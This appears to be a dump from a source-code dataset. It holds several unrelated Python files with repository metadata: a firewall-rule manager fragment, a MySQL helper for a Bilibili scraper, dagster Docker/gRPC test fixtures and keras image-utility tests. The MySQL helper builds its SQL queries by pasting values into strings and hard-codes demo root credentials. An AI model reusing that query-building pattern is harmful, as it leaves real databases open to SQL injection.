for object in object_list:
if object.get('name') == value:
properties = object.get('prop')
for prop in properties:
if prop.get('name') == group_type:
return create_element(group_type, prop.get('value'))
def validate_types(self, source_types, type):
if source_types:
valid_type_list = [
'gatewayinterface', 'virtualmachine', 'network', 'ipset',
'securitygroup', 'ip'
]
for source_type in source_types:
if source_type.lower() == 'any':
continue
source_type_arr = source_type.split(':')
if len(source_type_arr) <= 1:
raise InvalidParameterException(
type + " type should be in the format of "
"value:value_type. for ex: "
"ExtNw:gatewayinterface")
valid_type = source_type_arr[1]
if valid_type not in valid_type_list:
valid_type_list_str = ','.join(valid_type_list)
raise InvalidParameterException(
valid_type + " param is not valid. It should be "
"from " + valid_type_list_str)
def enable_disable_firewall_rule(self, is_enabled):
current_firewall_status = self._get_resource().enabled
if is_enabled == current_firewall_status:
return
if is_enabled:
self._get_resource().enabled = True
return self.client.put_resource(
self.href, self._get_resource(),
EntityType.DEFAULT_CONTENT_TYPE.value)
else:
self._get_resource().enabled = False
return self.client.put_resource(
self.href, self._get_resource(),
EntityType.DEFAULT_CONTENT_TYPE.value)
def info_firewall_rule(self):
firewall_rule_info = {}
resource = self._get_resource()
firewall_rule_info['Id'] = resource.id
firewall_rule_info['Name'] = resource.name
firewall_rule_info['Rule type'] = resource.ruleType
firewall_rule_info['Enabled'] = resource.enabled
firewall_rule_info['Logging enabled'] = resource.loggingEnabled
firewall_rule_info['Action'] = resource.action
return firewall_rule_info
def list_firewall_rule_source_destination(self, type):
resource = self._get_resource()
firewall_rule_source_destination = {}
if hasattr(resource, type):
if hasattr(resource[type], 'exclude'):
firewall_rule_source_destination['exclude'] = resource[
type].exclude
if hasattr(resource[type], 'vnicGroupId'):
firewall_rule_source_destination['vnicGroupId'] = [
vnicGroupId for vnicGroupId in resource[type].vnicGroupId
]
if hasattr(resource[type], 'ipAddress'):
firewall_rule_source_destination['ipAddress'] = [
ipAddress for ipAddress in resource[type].ipAddress
]
if hasattr(resource[type], 'groupingObjectId'):
firewall_rule_source_destination['groupingObjectId'] = [
groupingObjectId
for groupingObjectId in resource[type].groupingObjectId
]
return firewall_rule_source_destination
def _build_firewall_rules_href(self):
return self.network_url + FIREWALL_URL_TEMPLATE
def update_firewall_rule_sequence(self, index):
index = int(index)
gateway_res = Gateway(self.client, resource=self.parent)
firewall_rule = gateway_res.get_firewall_rules()
resource = self._get_resource()
for rule in firewall_rule.firewallRules.firewallRule:
if rule.id == resource.id:
firewall_rule.firewallRules.remove(rule)
firewall_rule.firewallRules.insert(index, rule)
break
return self.client.put_resource(self._build_firewall_rules_href(),
firewall_rule,
EntityType.DEFAULT_CONTENT_TYPE.value)
def delete_firewall_rule_source_destination(self, value, type):
resource = self._get_resource()
if hasattr(resource, type):
for object in resource[type].iter():
if object == value:
resource[type].remove(object)
return self.client.put_resource(self.href, resource,
EntityType.DEFAULT_CONTENT_TYPE.value)
| true
| true
|
f70b54bcca7c78b8d17ea7a455504224546fdeca
| 2,474
|
py
|
Python
|
network/db.py
|
LincZero/BiliTools
|
334190da7f6407fc85b20ff6d126a3dcd16505ab
|
[
"Apache-2.0"
] | null | null | null |
network/db.py
|
LincZero/BiliTools
|
334190da7f6407fc85b20ff6d126a3dcd16505ab
|
[
"Apache-2.0"
] | null | null | null |
network/db.py
|
LincZero/BiliTools
|
334190da7f6407fc85b20ff6d126a3dcd16505ab
|
[
"Apache-2.0"
] | null | null | null |
import MySQLdb
from biliClass.biliAid import Aid
import time
def dblink():  # connect to the database
    # demo credentials
return MySQLdb.connect(
host='localhost',
user='root',
passwd='password',
db='nav',
charset='utf8'
)
def dbsql(conn, sql):  # execute a SQL statement
cursor = conn.cursor()
cursor.execute(sql)
return cursor
def dbclose(cursor, conn):  # close the cursor and the connection
    cursor.close()
    conn.commit()  # possibly redundant, but kept for safety
    conn.close()
def insert(title, av_list):  # insert av records in a single batch
conn = dblink()
sql = """INSERT IGNORE INTO `nav_bili_v`
(`id`, `av`, `bv`, `class`, `title`, `pic`, `descript`, `dynamic`, `o_name`, `o_face`, `s_view`, `s_danmaku`, `s_reply`, `s_like`, `s_coin`, `s_favorite`, `s_share`, `s_time`, `up`)
VALUES """
try:
for av in av_list:
sql += f"""(NULL, '{av}', NULL, '{title}', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),"""
        sql = sql[:-1]+';'  # Python strings are immutable, so this rebinds the name
cursor = dbsql(conn, sql)
dbclose(cursor, conn)
        print('[log: insert succeeded]')
    except Exception:
        print('[log: insert failed]')
def read(where=''):  # read rows from the database
    if where != '':
        where = 'WHERE ' + where
conn = dblink()
sql = f"""SELECT * FROM `nav_bili_v` {where}"""
cursor = dbsql(conn, sql)
s = ''
for row in cursor.fetchall():
s = s + str(row) + '\n'
dbclose(cursor, conn)
return s
def autoUpdata(where=''):
    where1 = where2 = ''  # fix: previously undefined when `where` was empty
    if where != '':
        where1 = 'WHERE ' + where
        where2 = 'AND ' + where
    conn = dblink()
    # first SQL statement - read the list of av ids
    sql_r = f"""SELECT * FROM `nav_bili_v` {where1}"""
    cursor = dbsql(conn, sql_r)
    av_list = cursor.fetchall()
    # close only the cursor, keeping the connection open for the updates
    cursor.close()
    # second SQL statement - scrape each video's info and update the table
i = 0
for row in av_list[:]:
av = row[1]
try:
dic = Aid(av).dic
            time.sleep(0.3)  # polite crawling && avoids getting the IP banned
sql_u = """UPDATE `nav_bili_v` """
sql_u_temp = 'SET '
for value in dic.values():
for k,v in value.items():
sql_u_temp += f"`{k}`='{v[1]}',"
sql_u_temp = f'''{sql_u_temp[:-1]} WHERE `av`={av} {where2}'''
sql_u += sql_u_temp
cursor = dbsql(conn, sql_u)
            print(f'[seq {i}] av:{av} update complete')
        except Exception:
            print(f'[seq {i}] av:{av} update FAILED')
        i+=1
    print('\nAll rows in the table have been updated')
dbclose(cursor, conn)
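Worth flagging: the functions above splice values into SQL via f-strings, which breaks on titles containing quotes and is open to SQL injection. Below is a minimal sketch of the same batch insert using MySQLdb's parameter binding instead; `insert_safe` is a hypothetical name, and the sketch assumes the remaining `nav_bili_v` columns are nullable or have defaults.

# Sketch: batch insert with parameter binding instead of f-string interpolation.
def insert_safe(title, av_list):
    conn = dblink()
    cursor = conn.cursor()
    sql = "INSERT IGNORE INTO `nav_bili_v` (`av`, `class`) VALUES (%s, %s)"
    try:
        # one (av, title) tuple per row; the driver handles quoting/escaping
        cursor.executemany(sql, [(av, title) for av in av_list])
        conn.commit()
        print('[log: insert succeeded]')
    except Exception as exc:
        conn.rollback()
        print(f'[log: insert failed] {exc}')
    finally:
        cursor.close()
        conn.close()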
| 27.186813
| 185
| 0.516168
|
import MySQLdb
from biliClass.biliAid import Aid
import time
def dblink():
return MySQLdb.connect(
host='localhost',
user='root',
passwd='password',
db='nav',
charset='utf8'
)
def dbsql(conn, sql):
cursor = conn.cursor()
cursor.execute(sql)
return cursor
def dbclose(cursor, conn):
cursor.close()
conn.commit()
conn.close()
def insert(title, av_list):
conn = dblink()
sql = """INSERT IGNORE INTO `nav_bili_v`
(`id`, `av`, `bv`, `class`, `title`, `pic`, `descript`, `dynamic`, `o_name`, `o_face`, `s_view`, `s_danmaku`, `s_reply`, `s_like`, `s_coin`, `s_favorite`, `s_share`, `s_time`, `up`)
VALUES """
try:
for av in av_list:
sql += f"""(NULL, '{av}', NULL, '{title}', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL),"""
sql = sql[:-1]+';'
cursor = dbsql(conn, sql)
dbclose(cursor, conn)
        print('[log: insert succeeded]')
    except Exception:
        print('[log: insert failed]')
def read(where=''):
    if where != '':
        where = 'WHERE ' + where
conn = dblink()
sql = f"""SELECT * FROM `nav_bili_v` {where}"""
cursor = dbsql(conn, sql)
s = ''
for row in cursor.fetchall():
s = s + str(row) + '\n'
dbclose(cursor, conn)
return s
def autoUpdata(where=''):
    where1 = where2 = ''
    if where != '':
        where1 = 'WHERE ' + where
        where2 = 'AND ' + where
conn = dblink()
sql_r = f"""SELECT * FROM `nav_bili_v` {where1}"""
cursor = dbsql(conn, sql_r)
av_list = cursor.fetchall()
cursor.close()
i = 0
for row in av_list[:]:
av = row[1]
try:
dic = Aid(av).dic
time.sleep(0.3)
sql_u = """UPDATE `nav_bili_v` """
sql_u_temp = 'SET '
for value in dic.values():
for k,v in value.items():
sql_u_temp += f"`{k}`='{v[1]}',"
sql_u_temp = f'''{sql_u_temp[:-1]} WHERE `av`={av} {where2}'''
sql_u += sql_u_temp
cursor = dbsql(conn, sql_u)
            print(f'[seq {i}] av:{av} update complete')
        except Exception:
            print(f'[seq {i}] av:{av} update FAILED')
        i+=1
    print('\nAll rows in the table have been updated')
dbclose(cursor, conn)
| true
| true
|
f70b569498b82d470320a1d9546d114427f688b4
| 695
|
py
|
Python
|
cinderclient/v3/qos_specs.py
|
deepanshhu/python-cinderclient
|
2c0f74c708fd09c5ae813255aaa671073f2fe250
|
[
"Apache-1.1"
] | null | null | null |
cinderclient/v3/qos_specs.py
|
deepanshhu/python-cinderclient
|
2c0f74c708fd09c5ae813255aaa671073f2fe250
|
[
"Apache-1.1"
] | null | null | null |
cinderclient/v3/qos_specs.py
|
deepanshhu/python-cinderclient
|
2c0f74c708fd09c5ae813255aaa671073f2fe250
|
[
"Apache-1.1"
] | null | null | null |
# Copyright (c) 2013 eBay Inc.
# Copyright (c) OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
QoS Specs interface.
"""
from cinderclient.v2.qos_specs import * # noqa
| 30.217391
| 69
| 0.748201
|
from cinderclient.v2.qos_specs import *
| true
| true
|
f70b5953932541c87b991bde53d94cc13d35e857
| 36
|
py
|
Python
|
tests/__init__.py
|
quarkslab/ziphyr
|
f4b6f258b88ed5b4c8c1e0557ddd01e63f225407
|
[
"Apache-2.0"
] | 3
|
2020-12-13T10:52:50.000Z
|
2021-11-15T10:45:00.000Z
|
tests/__init__.py
|
quarkslab/ziphyr
|
f4b6f258b88ed5b4c8c1e0557ddd01e63f225407
|
[
"Apache-2.0"
] | null | null | null |
tests/__init__.py
|
quarkslab/ziphyr
|
f4b6f258b88ed5b4c8c1e0557ddd01e63f225407
|
[
"Apache-2.0"
] | 1
|
2021-11-14T02:56:49.000Z
|
2021-11-14T02:56:49.000Z
|
"""Unit test package for ziphyr."""
| 18
| 35
| 0.666667
| true
| true
|
|
f70b5a26a5001b76af41aed307f2de5fb84a932a
| 3,490
|
py
|
Python
|
python_modules/dagster/dagster_tests/conftest.py
|
johannkm/dagster-okteto
|
7ad30528a4a92945967d68e59e27727a1e839c2b
|
[
"Apache-2.0"
] | 1
|
2020-08-10T23:03:37.000Z
|
2020-08-10T23:03:37.000Z
|
python_modules/dagster/dagster_tests/conftest.py
|
johannkm/dagster-okteto
|
7ad30528a4a92945967d68e59e27727a1e839c2b
|
[
"Apache-2.0"
] | null | null | null |
python_modules/dagster/dagster_tests/conftest.py
|
johannkm/dagster-okteto
|
7ad30528a4a92945967d68e59e27727a1e839c2b
|
[
"Apache-2.0"
] | 1
|
2020-08-20T14:20:31.000Z
|
2020-08-20T14:20:31.000Z
|
import os
import subprocess
import time
from contextlib import contextmanager
import grpc
import pytest
from dagster_test.dagster_core_docker_buildkite import (
build_and_tag_test_image,
test_project_docker_image,
)
from dagster import check
from dagster.grpc.client import DagsterGrpcClient
from dagster.utils import file_relative_path
IS_BUILDKITE = os.getenv('BUILDKITE') is not None
HARDCODED_PORT = 8090
@pytest.fixture(scope='session')
def dagster_docker_image():
docker_image = test_project_docker_image()
if not IS_BUILDKITE:
# Being conservative here when first introducing this. This could fail
# if the Docker daemon is not running, so for now we just skip the tests using this
# fixture if the build fails, and warn with the output from the build command
try:
build_and_tag_test_image(docker_image)
except subprocess.CalledProcessError as exc_info:
pytest.skip(
"Skipped container tests due to a failure when trying to build the image. "
"Most likely, the docker deamon is not running.\n"
"Output:\n{}".format(exc_info.output.decode())
)
return docker_image
def wait_for_connection(host, port):
retry_limit = 20
while retry_limit:
try:
if DagsterGrpcClient(host=host, port=port).ping("ready") == "ready":
return True
except grpc.RpcError:
pass
time.sleep(0.2)
retry_limit -= 1
    pytest.skip(
        "Skipped grpc container tests due to a failure when trying to connect to the GRPC server "
        "at {host}:{port}".format(host=host, port=port)
    )
@contextmanager
def docker_service_up(docker_compose_file, service_name):
check.str_param(service_name, 'service_name')
check.str_param(docker_compose_file, 'docker_compose_file')
check.invariant(
os.path.isfile(docker_compose_file), 'docker_compose_file must specify a valid file'
)
if not IS_BUILDKITE:
env = os.environ.copy()
env["IMAGE_NAME"] = test_project_docker_image()
try:
subprocess.check_output(
['docker-compose', '-f', docker_compose_file, 'stop', service_name], env=env,
)
subprocess.check_output(
['docker-compose', '-f', docker_compose_file, 'rm', '-f', service_name], env=env,
)
except Exception: # pylint: disable=broad-except
pass
subprocess.check_output(
['docker-compose', '-f', docker_compose_file, 'up', '-d', service_name], env=env,
)
yield
@pytest.fixture(scope='session')
def grpc_host():
# In buildkite we get the ip address from this variable (see buildkite code for commentary)
# Otherwise assume local development and assume localhost
env_name = 'GRPC_SERVER_HOST'
if env_name not in os.environ:
os.environ[env_name] = 'localhost'
return os.environ[env_name]
@pytest.fixture(scope='session')
def grpc_port():
yield HARDCODED_PORT
@pytest.fixture(scope='session')
def docker_grpc_client(
dagster_docker_image, grpc_host, grpc_port
): # pylint: disable=redefined-outer-name, unused-argument
    if not IS_BUILDKITE:
        with docker_service_up(file_relative_path(__file__, 'docker-compose.yml'),
                               'dagster-grpc-server'):
            wait_for_connection(grpc_host, grpc_port)
            yield DagsterGrpcClient(port=grpc_port, host=grpc_host)
    else:
        wait_for_connection(grpc_host, grpc_port)
        yield DagsterGrpcClient(port=grpc_port, host=grpc_host)
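For context, a test consumes these fixtures simply by declaring them as parameters; the test name below is hypothetical, and `ping("ready")` is the same call `wait_for_connection` makes above.

# Hypothetical test using the fixture above; pytest injects docker_grpc_client.
def test_grpc_server_responds(docker_grpc_client):
    assert docker_grpc_client.ping("ready") == "ready"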
| 30.884956
| 100
| 0.67851
|
import os
import subprocess
import time
from contextlib import contextmanager
import grpc
import pytest
from dagster_test.dagster_core_docker_buildkite import (
build_and_tag_test_image,
test_project_docker_image,
)
from dagster import check
from dagster.grpc.client import DagsterGrpcClient
from dagster.utils import file_relative_path
IS_BUILDKITE = os.getenv('BUILDKITE') is not None
HARDCODED_PORT = 8090
@pytest.fixture(scope='session')
def dagster_docker_image():
docker_image = test_project_docker_image()
if not IS_BUILDKITE:
try:
build_and_tag_test_image(docker_image)
except subprocess.CalledProcessError as exc_info:
pytest.skip(
"Skipped container tests due to a failure when trying to build the image. "
"Most likely, the docker deamon is not running.\n"
"Output:\n{}".format(exc_info.output.decode())
)
return docker_image
def wait_for_connection(host, port):
retry_limit = 20
while retry_limit:
try:
if DagsterGrpcClient(host=host, port=port).ping("ready") == "ready":
return True
except grpc.RpcError:
pass
time.sleep(0.2)
retry_limit -= 1
    pytest.skip(
        "Skipped grpc container tests due to a failure when trying to connect to the GRPC server "
        "at {host}:{port}".format(host=host, port=port)
    )
@contextmanager
def docker_service_up(docker_compose_file, service_name):
check.str_param(service_name, 'service_name')
check.str_param(docker_compose_file, 'docker_compose_file')
check.invariant(
os.path.isfile(docker_compose_file), 'docker_compose_file must specify a valid file'
)
if not IS_BUILDKITE:
env = os.environ.copy()
env["IMAGE_NAME"] = test_project_docker_image()
try:
subprocess.check_output(
['docker-compose', '-f', docker_compose_file, 'stop', service_name], env=env,
)
subprocess.check_output(
['docker-compose', '-f', docker_compose_file, 'rm', '-f', service_name], env=env,
)
except Exception: # pylint: disable=broad-except
pass
subprocess.check_output(
['docker-compose', '-f', docker_compose_file, 'up', '-d', service_name], env=env,
)
yield
@pytest.fixture(scope='session')
def grpc_host():
# In buildkite we get the ip address from this variable (see buildkite code for commentary)
# Otherwise assume local development and assume localhost
env_name = 'GRPC_SERVER_HOST'
if env_name not in os.environ:
os.environ[env_name] = 'localhost'
return os.environ[env_name]
@pytest.fixture(scope='session')
def grpc_port():
yield HARDCODED_PORT
@pytest.fixture(scope='session')
def docker_grpc_client(
dagster_docker_image, grpc_host, grpc_port
): # pylint: disable=redefined-outer-name, unused-argument
    if not IS_BUILDKITE:
        with docker_service_up(file_relative_path(__file__, 'docker-compose.yml'),
                               'dagster-grpc-server'):
            wait_for_connection(grpc_host, grpc_port)
            yield DagsterGrpcClient(port=grpc_port, host=grpc_host)
    else:
        wait_for_connection(grpc_host, grpc_port)
        yield DagsterGrpcClient(port=grpc_port, host=grpc_host)
| true
| true
|
f70b5aa7ce7c85310bc3393804622e2a327dc477
| 16,705
|
py
|
Python
|
tests/image/utils_test.py
|
ayman3000/keras-preprocessing
|
845c423e01acfe251d4276e52cf2b86e73f1646a
|
[
"MIT"
] | 1,071
|
2018-05-30T23:04:13.000Z
|
2022-03-23T08:50:10.000Z
|
tests/image/utils_test.py
|
ayman3000/keras-preprocessing
|
845c423e01acfe251d4276e52cf2b86e73f1646a
|
[
"MIT"
] | 286
|
2018-05-31T14:17:50.000Z
|
2022-03-31T10:13:57.000Z
|
tests/image/utils_test.py
|
ayman3000/keras-preprocessing
|
845c423e01acfe251d4276e52cf2b86e73f1646a
|
[
"MIT"
] | 529
|
2018-05-30T23:21:34.000Z
|
2022-03-08T19:11:06.000Z
|
import io
import resource
from pathlib import Path
import numpy as np
import PIL
import pytest
from keras_preprocessing.image import utils
def test_validate_filename(tmpdir):
valid_extensions = ('png', 'jpg')
filename = tmpdir.ensure('test.png')
assert utils.validate_filename(str(filename), valid_extensions)
filename = tmpdir.ensure('test.PnG')
assert utils.validate_filename(str(filename), valid_extensions)
filename = tmpdir.ensure('test.some_extension')
assert not utils.validate_filename(str(filename), valid_extensions)
assert not utils.validate_filename('some_test_file.png', valid_extensions)
def test_load_img(tmpdir):
filename_rgb = str(tmpdir / 'rgb_utils.png')
filename_rgba = str(tmpdir / 'rgba_utils.png')
filename_grayscale_8bit = str(tmpdir / 'grayscale_8bit_utils.png')
filename_grayscale_16bit = str(tmpdir / 'grayscale_16bit_utils.tiff')
filename_grayscale_32bit = str(tmpdir / 'grayscale_32bit_utils.tiff')
original_rgb_array = np.array(255 * np.random.rand(100, 100, 3),
dtype=np.uint8)
original_rgb = utils.array_to_img(original_rgb_array, scale=False)
original_rgb.save(filename_rgb)
original_rgba_array = np.array(255 * np.random.rand(100, 100, 4),
dtype=np.uint8)
original_rgba = utils.array_to_img(original_rgba_array, scale=False)
original_rgba.save(filename_rgba)
original_grayscale_8bit_array = np.array(255 * np.random.rand(100, 100, 1),
dtype=np.uint8)
original_grayscale_8bit = utils.array_to_img(original_grayscale_8bit_array,
scale=False)
original_grayscale_8bit.save(filename_grayscale_8bit)
original_grayscale_16bit_array = np.array(
np.random.randint(-2147483648, 2147483647, (100, 100, 1)), dtype=np.int16
)
original_grayscale_16bit = utils.array_to_img(original_grayscale_16bit_array,
scale=False, dtype='int16')
original_grayscale_16bit.save(filename_grayscale_16bit)
original_grayscale_32bit_array = np.array(
np.random.randint(-2147483648, 2147483647, (100, 100, 1)), dtype=np.int32
)
original_grayscale_32bit = utils.array_to_img(original_grayscale_32bit_array,
scale=False, dtype='int32')
original_grayscale_32bit.save(filename_grayscale_32bit)
# Test that loaded image is exactly equal to original.
loaded_im = utils.load_img(filename_rgb)
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == original_rgb_array.shape
assert np.all(loaded_im_array == original_rgb_array)
loaded_im = utils.load_img(filename_rgba, color_mode='rgba')
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == original_rgba_array.shape
assert np.all(loaded_im_array == original_rgba_array)
loaded_im = utils.load_img(filename_rgb, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (original_rgb_array.shape[0],
original_rgb_array.shape[1], 1)
loaded_im = utils.load_img(filename_grayscale_8bit, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == original_grayscale_8bit_array.shape
assert np.all(loaded_im_array == original_grayscale_8bit_array)
loaded_im = utils.load_img(filename_grayscale_16bit, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im, dtype='int16')
assert loaded_im_array.shape == original_grayscale_16bit_array.shape
assert np.all(loaded_im_array == original_grayscale_16bit_array)
# test casting int16 image to float32
loaded_im_array = utils.img_to_array(loaded_im)
assert np.allclose(loaded_im_array, original_grayscale_16bit_array)
loaded_im = utils.load_img(filename_grayscale_32bit, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im, dtype='int32')
assert loaded_im_array.shape == original_grayscale_32bit_array.shape
assert np.all(loaded_im_array == original_grayscale_32bit_array)
# test casting int32 image to float32
loaded_im_array = utils.img_to_array(loaded_im)
assert np.allclose(loaded_im_array, original_grayscale_32bit_array)
# Test that nothing is changed when target size is equal to original.
loaded_im = utils.load_img(filename_rgb, target_size=(100, 100))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == original_rgb_array.shape
assert np.all(loaded_im_array == original_rgb_array)
loaded_im = utils.load_img(filename_rgba, color_mode='rgba',
target_size=(100, 100))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == original_rgba_array.shape
assert np.all(loaded_im_array == original_rgba_array)
loaded_im = utils.load_img(filename_rgb, color_mode='grayscale',
target_size=(100, 100))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (original_rgba_array.shape[0],
original_rgba_array.shape[1], 1)
loaded_im = utils.load_img(filename_grayscale_8bit, color_mode='grayscale',
target_size=(100, 100))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == original_grayscale_8bit_array.shape
assert np.all(loaded_im_array == original_grayscale_8bit_array)
loaded_im = utils.load_img(filename_grayscale_16bit, color_mode='grayscale',
target_size=(100, 100))
loaded_im_array = utils.img_to_array(loaded_im, dtype='int16')
assert loaded_im_array.shape == original_grayscale_16bit_array.shape
assert np.all(loaded_im_array == original_grayscale_16bit_array)
loaded_im = utils.load_img(filename_grayscale_32bit, color_mode='grayscale',
target_size=(100, 100))
loaded_im_array = utils.img_to_array(loaded_im, dtype='int32')
assert loaded_im_array.shape == original_grayscale_32bit_array.shape
assert np.all(loaded_im_array == original_grayscale_32bit_array)
# Test down-sampling with bilinear interpolation.
loaded_im = utils.load_img(filename_rgb, target_size=(25, 25))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (25, 25, 3)
loaded_im = utils.load_img(filename_rgba, color_mode='rgba',
target_size=(25, 25))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (25, 25, 4)
loaded_im = utils.load_img(filename_rgb, color_mode='grayscale',
target_size=(25, 25))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (25, 25, 1)
loaded_im = utils.load_img(filename_grayscale_8bit, color_mode='grayscale',
target_size=(25, 25))
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (25, 25, 1)
loaded_im = utils.load_img(filename_grayscale_16bit, color_mode='grayscale',
target_size=(25, 25))
loaded_im_array = utils.img_to_array(loaded_im, dtype='int16')
assert loaded_im_array.shape == (25, 25, 1)
loaded_im = utils.load_img(filename_grayscale_32bit, color_mode='grayscale',
target_size=(25, 25))
loaded_im_array = utils.img_to_array(loaded_im, dtype='int32')
assert loaded_im_array.shape == (25, 25, 1)
# Test down-sampling with nearest neighbor interpolation.
loaded_im_nearest = utils.load_img(filename_rgb, target_size=(25, 25),
interpolation="nearest")
loaded_im_array_nearest = utils.img_to_array(loaded_im_nearest)
assert loaded_im_array_nearest.shape == (25, 25, 3)
assert np.any(loaded_im_array_nearest != loaded_im_array)
loaded_im_nearest = utils.load_img(filename_rgba, color_mode='rgba',
target_size=(25, 25),
interpolation="nearest")
loaded_im_array_nearest = utils.img_to_array(loaded_im_nearest)
assert loaded_im_array_nearest.shape == (25, 25, 4)
assert np.any(loaded_im_array_nearest != loaded_im_array)
loaded_im = utils.load_img(filename_grayscale_8bit, color_mode='grayscale',
target_size=(25, 25), interpolation="nearest")
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (25, 25, 1)
loaded_im = utils.load_img(filename_grayscale_16bit, color_mode='grayscale',
target_size=(25, 25), interpolation="nearest")
loaded_im_array = utils.img_to_array(loaded_im, dtype='int16')
assert loaded_im_array.shape == (25, 25, 1)
loaded_im = utils.load_img(filename_grayscale_32bit, color_mode='grayscale',
target_size=(25, 25), interpolation="nearest")
loaded_im_array = utils.img_to_array(loaded_im, dtype='int32')
assert loaded_im_array.shape == (25, 25, 1)
# Test different path type
with open(filename_grayscale_32bit, 'rb') as f:
_path = io.BytesIO(f.read()) # io.Bytesio
loaded_im = utils.load_img(_path, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im, dtype=np.int32)
assert np.all(loaded_im_array == original_grayscale_32bit_array)
_path = filename_grayscale_32bit # str
loaded_im = utils.load_img(_path, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im, dtype=np.int32)
assert np.all(loaded_im_array == original_grayscale_32bit_array)
_path = filename_grayscale_32bit.encode() # bytes
loaded_im = utils.load_img(_path, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im, dtype=np.int32)
assert np.all(loaded_im_array == original_grayscale_32bit_array)
_path = Path(tmpdir / 'grayscale_32bit_utils.tiff') # Path
loaded_im = utils.load_img(_path, color_mode='grayscale')
loaded_im_array = utils.img_to_array(loaded_im, dtype=np.int32)
assert np.all(loaded_im_array == original_grayscale_32bit_array)
    # With no target_size the interpolation argument is ignored, so this call
    # must not raise; resizing with an unsupported interpolation (below) must.
loaded_im = utils.load_img(filename_rgb, interpolation="unsupported")
with pytest.raises(ValueError):
loaded_im = utils.load_img(filename_rgb, target_size=(25, 25),
interpolation="unsupported")
# Check that the aspect ratio of a square is the same
filename_red_square = str(tmpdir / 'red_square_utils.png')
A = np.zeros((50, 100, 3), dtype=np.uint8) # rectangle image 100x50
A[20:30, 45:55, 0] = 255 # red square 10x10
red_square_array = np.array(A)
red_square = utils.array_to_img(red_square_array, scale=False)
red_square.save(filename_red_square)
loaded_im = utils.load_img(filename_red_square, target_size=(25, 25),
keep_aspect_ratio=True)
loaded_im_array = utils.img_to_array(loaded_im)
assert loaded_im_array.shape == (25, 25, 3)
    red_channel_arr = loaded_im_array[:, :, 0].astype(bool)  # np.bool was removed in NumPy >= 1.24
square_width = np.sum(np.sum(red_channel_arr, axis=0))
square_height = np.sum(np.sum(red_channel_arr, axis=1))
aspect_ratio_result = square_width / square_height
# original square had 1:1 ratio
assert aspect_ratio_result == pytest.approx(1.0)
def test_list_pictures(tmpdir):
filenames = ['test.png', 'test0.jpg', 'test-1.jpeg', '2test.bmp',
'2-test.ppm', '3.png', '1.jpeg', 'test.bmp', 'test0.ppm',
'test4.tiff', '5-test.tif', 'test.txt', 'foo.csv',
'face.gif', 'bar.txt']
subdirs = ['', 'subdir1', 'subdir2']
filenames = [tmpdir.ensure(subdir, f) for subdir in subdirs
for f in filenames]
found_images = utils.list_pictures(str(tmpdir))
assert len(found_images) == 33
found_images = utils.list_pictures(str(tmpdir), ext='png')
assert len(found_images) == 6
def test_array_to_img_and_img_to_array():
height, width = 10, 8
# Test the data format
# Test RGB 3D
x = np.random.random((3, height, width))
img = utils.array_to_img(x, data_format='channels_first')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_first')
assert x.shape == (3, height, width)
# Test RGBA 3D
x = np.random.random((4, height, width))
img = utils.array_to_img(x, data_format='channels_first')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_first')
assert x.shape == (4, height, width)
# Test 2D
x = np.random.random((1, height, width))
img = utils.array_to_img(x, data_format='channels_first')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_first')
assert x.shape == (1, height, width)
# grayscale 32-bit signed integer
x = np.array(
np.random.randint(-2147483648, 2147483647, (1, height, width)),
dtype=np.int32
)
img = utils.array_to_img(x, data_format='channels_first')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_first')
assert x.shape == (1, height, width)
# Test tf data format
# Test RGB 3D
x = np.random.random((height, width, 3))
img = utils.array_to_img(x, data_format='channels_last')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_last')
assert x.shape == (height, width, 3)
# Test RGBA 3D
x = np.random.random((height, width, 4))
img = utils.array_to_img(x, data_format='channels_last')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_last')
assert x.shape == (height, width, 4)
# Test 2D
x = np.random.random((height, width, 1))
img = utils.array_to_img(x, data_format='channels_last')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_last')
assert x.shape == (height, width, 1)
# grayscale 16-bit signed integer
x = np.array(
np.random.randint(-2147483648, 2147483647, (height, width, 1)),
dtype=np.int16
)
img = utils.array_to_img(x, data_format='channels_last')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_last')
assert x.shape == (height, width, 1)
# grayscale 32-bit signed integer
x = np.array(
np.random.randint(-2147483648, 2147483647, (height, width, 1)),
dtype=np.int32
)
img = utils.array_to_img(x, data_format='channels_last')
assert img.size == (width, height)
x = utils.img_to_array(img, data_format='channels_last')
assert x.shape == (height, width, 1)
